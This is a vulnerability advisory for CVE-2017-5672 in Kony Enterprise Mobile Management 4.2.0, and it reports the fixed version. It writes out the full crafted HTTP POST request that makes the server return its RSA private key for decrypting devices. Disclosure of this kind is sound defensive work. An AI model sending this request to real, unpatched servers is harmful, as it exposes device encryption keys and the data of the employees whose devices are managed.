------------------------------------------------------------------------

Product: Enterprise Mobile Management
Vendor: Kony
Vulnerable Version(s): Kony EMM 4.2.0 and probably older versions 
Tested Version: Kony EMM 4.2.0 
Advisory Publication: 20 March 2017 
Vendor Notification: 29 Jan 2017 
Vulnerability Type: Private Key Disclosure 
CVE Reference: CVE-2017-5672 
Risk Level: Medium 
Status: Solution is released Kony EMM 4.2.5.2
Discovered and Provided: Ayman Almajid
------------------------------------------------------------------------

About the vendor:
Kony EMM is a mobile management suite that allows organizations to manage employee's personal devices. It enables users to use their own device, or as often called BYOD or "bring your own device".

About the vulnerability:
During a pentest we discovered that a logged in user can manipulate the HTTP request and cause the EMM server to send the RSA private key which is used to decrypt the device.

By submitting the below HTTP request, the private key will be received on the response:

POST /emm/device/rest/myapps HTTP/1.1
Accept-Encoding: gzip
adke: 1
devicemodel: <device_model>
devicename: android
osversion: <os_version>
Content-Type: application/x-www-form-urlencoded
platformid: ANDROID
lv: 1.0.0.7
deviceid: <device_id>
Accept: application/json
Accept-Language: en
Content-Length: 65
Host: <host>
Connection: close
User-Agent: <user_agent>
Expect: 100-continue
Cookie: <cookies>

platformid=ANDROID&afw1000=true&enc=true&afw1001=false&isEMM=true


-----------------------

Solution:

Upgrade to Kony EMM 4.2.5.2

References:

[1] help AG middle East http://www.helpag.com
[2] Kony https://kony.com